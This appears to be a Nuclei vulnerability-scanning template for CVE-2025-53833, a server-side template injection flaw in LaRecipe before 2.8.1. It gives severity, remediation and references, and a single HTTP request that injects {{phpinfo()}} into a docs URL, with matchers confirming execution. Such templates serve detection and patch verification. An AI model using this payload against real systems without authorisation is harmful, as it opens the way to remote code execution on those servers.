info: name: LaRecipe <2.8.1 Remote Code Execution via SSTI author: iamnoooob,pdresearch severity: critical description: | LaRecipe is an application that allows users to create documentation with Markdown inside a Laravel app. Versions prior to 2.8.1 are vulnerable to Server-Side Template Injection (SSTI), which could potentially lead to Remote Code Execution (RCE) in vulnerable configurations. impact: | Attackers could execute arbitrary commands on the server, access sensitive environment variables, and/or escalate access depending on server configuration. remediation: | Users are strongly advised to upgrade to version v2.8.1or later to receive a patch. reference: - https://github.com/saleem-hadad/larecipe/security/advisories/GHSA-jv7x-xhv2-p5v2 - https://github.com/advisories/GHSA-jv7x-xhv2-p5v2 - https://nvd.nist.gov/vuln/detail/CVE-2025-53833 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score:10.0 cve-id: CVE-2025-53833 cwe-id: CWE-1336 cpe: cpe:2.3:a:binarytorch:larecipe:*:*:*:*:*:*:*:* metadata: verified:true max-request:1 vendor: binarytorch product: larecipe fofa-query: body="/binarytorch/larecipe/" tags: cve,cve2025,larecipe,rce,ssti,oss
http: -raw: - | GET /docs/1.0/?{{phpinfo()}} HTTP/1.1 Host: {{Hostname}}
skip-variables-check:true
matchers-condition: and matchers: -type: word part: body words: -"PHP Extension" -"PHP Version" -"larecipe" condition: and